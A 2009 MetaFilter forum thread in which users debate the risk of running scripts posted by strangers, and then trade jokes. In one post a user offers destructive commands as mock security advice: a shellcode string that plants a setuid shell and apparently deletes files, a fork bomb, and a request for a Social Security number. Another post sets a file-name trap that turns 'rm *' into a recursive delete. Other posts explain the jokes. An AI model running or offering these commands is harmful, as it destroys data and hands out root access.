Folk around here trust each other, do they? September 12, 2009 10:06 PM

Let me know if this is the wrong forum, but in this AskMeFi thread the OP apparently executed a script someone wrote him. Judging from one of his follow-up comments, he had no knowledge of Windows batch files. I'm a little disturbed. Am I paranoid?
posted by d. z. wang to Etiquette/Policy at 10:06 PM (35 comments total)

I'm not sure why you should be disturbed. I mean sure someone could have potentially done something malicious, but it would be the last thing they'd ever do on MetaFilter.
posted by jessamyn (staff) at 10:13 PM on September 12, 2009 [1 favorite]


Hm. My thoughts on this are two-fold. First, people need to be intelligent in their browsing habits here, as they should be anywhere, and be careful of potentially harmful things whether it's a suspicious link or, like in this case, some solicited code. Second, the community polices itself pretty well in regards to this sort of thing and malicious code or links would get called out pretty quickly, I bet - I've seen it done in the past.

So I guess you're not paranoid, but I also don't think you should be disturbed.
posted by empyrean at 10:19 PM on September 12, 2009


My experience with AskMe suggests that other people would be very quick to a) flag and b) comment if such a thing were outright misleading, let alone malicious.
posted by djgh at 10:21 PM on September 12, 2009 [3 favorites]


You don't need to know much about batch files to see that these scripts are as advertised.
posted by The Light Fantastic at 10:31 PM on September 12, 2009 [2 favorites]


Though it is easy to type these things wrong and potentially destroy data. I myself destroyed my test data as I was trying to get my version working. Always back up your data before operating on it.
posted by jeffamaphone at 10:46 PM on September 12, 2009


Yeah, nothing disturbing about it. Since the code is basically printed as is right on the page, there's no hiding anything: if someone saw something suspicious they would have brought it to a mod's attention as soon as possible.

I see where your concern is, though. If no one paid attention to that thread, and he ran a script that formatted his drive, that would be a Really Bad Thing™. But then there's the whole "Don't do stuff to your computer if you don't know what it does", etc. So let's just leave it at that.
posted by Askiba at 10:51 PM on September 12, 2009




The more visible code is, the less risk you take by running it. A plaintext batch file like that, posted in public where hundreds or thousands of people can see it, is a very low risk indeed.

If the code were obfuscated in some way, or not publicly accessible, you'd be smart to read it carefully before running it. Batch files can potentially be dangerous, but typically they need to be pretty complex to do more than simple mischief. As long as it looks safe, it almost certainly is.

Defaulting to paranoia is not a bad idea, and will overall serve you well on the Internet, but in this specific case, there's no danger.
posted by Malor at 11:54 PM on September 12, 2009 [1 favorite]


Like everybody said, since it's just a script, and not a binary executable, there's very little potential for malicious action: even if the intended user was clueless, other people would see it. I would be more worried about the subliminal messages in the FNORD comments myself.
posted by Dr Dracator at 12:02 AM on September 13, 2009


What is the problem here? Those are adults with domain knowledge sharing ideas in a totally transparent scripting language. I've posted many Python examples and even pointed people to code I have written. If any of it were malicious, I would not have an account any longer. If you run shit you found on the internet without understanding it, there is some inherent risk, but it's pretty bleeding obvious that the parties involved know what they're doing enough to assess that risk. Do you also worry someone will ruin their love life when they get a DTMFA response to relationship questions?

I promise you that if this code had something nasty in it or was obfuscated to the point where you couldn't tell one way or the other, it wouldn't last very long.
posted by cj_ at 12:08 AM on September 13, 2009


This is a very security conscious community. We don't even allow images, cause anytime you see an image on a web page, it can hack you. True story.
posted by 31d1 at 12:29 AM on September 13, 2009 [2 favorites]


As long as you didn't flinch that time I told someone with an electrical question to attach the black wire to a copper pipe near their shower for proper grounding, or the time I explained that as long as the gas tank was absolutely full, then it was OK to weld up the leak, or all those times I said, "Yeah, I'd eat it" on AskMeFi, I'd say you're not paranoid enough!
posted by Kid Charlemagne at 12:33 AM on September 13, 2009


If you think that's bad, you should C1ALIS see the drivers I installed earlier this week on FREE VI4GRA someone's suggestion. But nothing bad HOT BAB3S came of that, so I don't see a problem here.
posted by 0xFCAF at 1:36 AM on September 13, 2009


Come on baby,
Don't fear the reaper
Take AskMe's hand,
Don't fear the reaper
We'll all teach you to fly,
Don't fear the reaper
posted by mrmojoflying at 5:35 AM on September 13, 2009


31d1 - that's because images broadcast your IP address...
posted by russm at 5:57 AM on September 13, 2009


Don't worry! Just go in to your terminal and copy/paste:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

That will protect your computer from malicious commands, if not, copy/paste this: ":(){:|:&};:" then get a rare earth magnet and place it on the top (NOT THE BOTTOM!) of your hard drive and that will protect it as well, but on a hardware level, which is good. You should probably do both of these if you get the chance

If you send me your Social Security number and a bank account number I can just remote desktop your computer and set up a basic firewall that will protect your computer.

BUT SERIOUSLY FOLKS DON'T DO THESE THINGS I JUST SAID THEY ARE AN EXAMPLE OF MALICIOUS COMMANDS
posted by fuq at 8:56 AM on September 13, 2009 [1 favorite]


touch -- -rf \*
posted by flabdablet at 9:46 AM on September 13, 2009


Pressing ALT+F4 highlights any potentially malicious scripts in Firefox.
posted by fire&wings at 10:43 AM on September 13, 2009 [1 favorite]


If you have questions, type "/q" -- that's all I know.
posted by not_on_display at 11:05 AM on September 13, 2009


Fuq's shellscript there is a very good example of what I meant by 'not running obfuscated code'. :-)
posted by Malor at 12:06 PM on September 13, 2009


Always format c:
Never format c:

Just always format b:
posted by jpdoane at 1:52 PM on September 13, 2009


Crap.

Always format b:, that is

(I fail at MetaTalk. When do we get that new comment editing system?)
posted by jpdoane at 1:55 PM on September 13, 2009


It's better the way you typed it. Poetic, even.
posted by ook at 7:46 PM on September 13, 2009


The drive that can be formatted is not the true drive.
posted by nebulawindphone at 9:29 PM on September 13, 2009


I'm pinging your local loopback from within right this moment.
posted by Burhanistan at 10:12 PM on September 13, 2009


Do you geeks even know how chilling your little musings sound to regular people? It's like listening to Pol Pot and Himmler talk shop.
posted by Methylviolet at 11:11 PM on September 13, 2009 [1 favorite]


Do you geeks even know how chilling your little musings sound to regular people? It's like listening to Pol Pot and Himmler talk shop.

Only if you're a bit.
posted by The Light Fantastic at 11:33 PM on September 13, 2009


Do you geeks even know how chilling your little musings sound to regular people?

Having no wish to chill regular people, I suppose I should present the antidote to my little musing above.

touch -- --version

posted by flabdablet at 11:41 PM on September 13, 2009


There was an AskMe question once about looking for a productivity app that I had coincidentally already written for myself. A few people asked me about it via MeMail and I emailed them the program (a standard Windows binary). Then I stole their credit card numbers and bought a new stereo system! Win for everyone involved.
posted by burnmp3s at 6:56 AM on September 14, 2009


hey burnmp3s, can I have a copy of your program (really)? Also, you should put it up on sourceforge or something and add a link on your user page.
posted by jacalata at 9:04 AM on September 14, 2009


Can I have a copy of the credit card numbers?
posted by owtytrof at 10:08 AM on September 14, 2009


I'd like a signed 8x10 if possible.
posted by ODiV at 11:21 AM on September 14, 2009


My original question is quite settled. But now, at risk of derail, could fuq, flabdablet, and fire&wings, and not_on_display explain / review my explanations of their jokes?

The touch creates files named '-rf' and '*' which will be shell-expanded into later commands and interpreted as options. Probably to make 'rm *' into 'rm -rf *', although I'd argue that if you're typing 'rm *' and relying on the write-protection to save the files you want, you're kind of asking for it.

The :(){:|:&};: is a forkbomb.

/q closes the IRC client with which I was about to ask the question, and similarly ALT-F4 closes firefox.

The hex business I had to Google, but apparently it translates to 'rm -rf ~ / &'. Although what I'm assigning into is still a mystery:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */

So that's an array of char's named "__attribute__((section(".text")))" ? Is this a variable the compiler will write verbatim into the .text section of the binary?
posted by d. z. wang at 12:51 AM on September 15, 2009


You got mine.

Also, touch -- --version creates a file called --version in the current directory. If you're still in that directory when you use any command with * as an argument, one of the filenames expanded into the command line will be --version, which most GNU tools will interpret as an instruction to show you their version number instead of doing whatever else they do. So if you have a --version file as well as a -rf file, nothing bad will happen to you when you carelessly try to remove the pesky-looking * file. Hence, antidote.

Gets a little annoying when you do want to do something with all files in the current directory, though :-)
posted by flabdablet at 2:19 AM on September 15, 2009
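
The glob behaviour flabdablet describes above, and the usual defence against it (a ./ prefix on the glob plus the -- end-of-options marker), as an added shell example that is not part of any post in this thread. The function names and the scratch directory layout are made up for the demo.

```shell
#!/bin/sh
# Constructed demo: everything happens inside a fresh mktemp directory.

# Build a scratch directory holding the two file names from the thread,
# one ordinary file, and a subdirectory a recursive delete would take too.
make_demo_dir() {
    d=$(mktemp -d) || return 1
    mkdir "$d/sub"
    : > "$d/sub/inner.txt"
    : > "$d/keep.txt"
    : > "$d/-rf"
    : > "$d/--version"
    printf '%s\n' "$d"
}

# Count the words that PREFIX* expands to in DIR which start with '-',
# i.e. the ones a command's option parser would read as switches.
# An empty PREFIX is the bare * from the thread; "./" is the safe form.
count_option_like() (
    cd "$1" || exit 1
    n=0
    for f in "$2"*; do
        case $f in -*) n=$((n + 1)) ;; esac
    done
    printf '%s\n' "$n"
)

# Delete only the regular files in DIR. The ./ prefix and the -- marker
# each stop a file name from being parsed as an option, so the file
# called -rf is removed as a file and sub/ is left alone.
remove_plain_files() (
    cd "$1" || exit 1
    for f in ./*; do
        if [ -f "$f" ]; then rm -- "$f"; fi
    done
)

demo=$(make_demo_dir)
echo "option-like words from *:   $(count_option_like "$demo" "")"
echo "option-like words from ./*: $(count_option_like "$demo" "./")"
remove_plain_files "$demo"
rm -rf -- "$demo"
```
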


flabdablet- Subtle. Evil. I like it.

Agreeing- knowledge is not dangerous. If someone says "how do I format my hard drive" and you give them instructions, and then they ask "where are all my pictures, I thought formatting would fix my problems", that's on them. It is not the fault of the speaker when they tell someone HOW to do something if the listener doesn't know what they are doing. You'd have to be a complete moron to run code you didn't understand.

On the other hand, I keep forgetting that computers are magic, and are supposed to do what you want them to do, not what you tell them to do.
posted by gjc at 6:19 PM on September 16, 2009

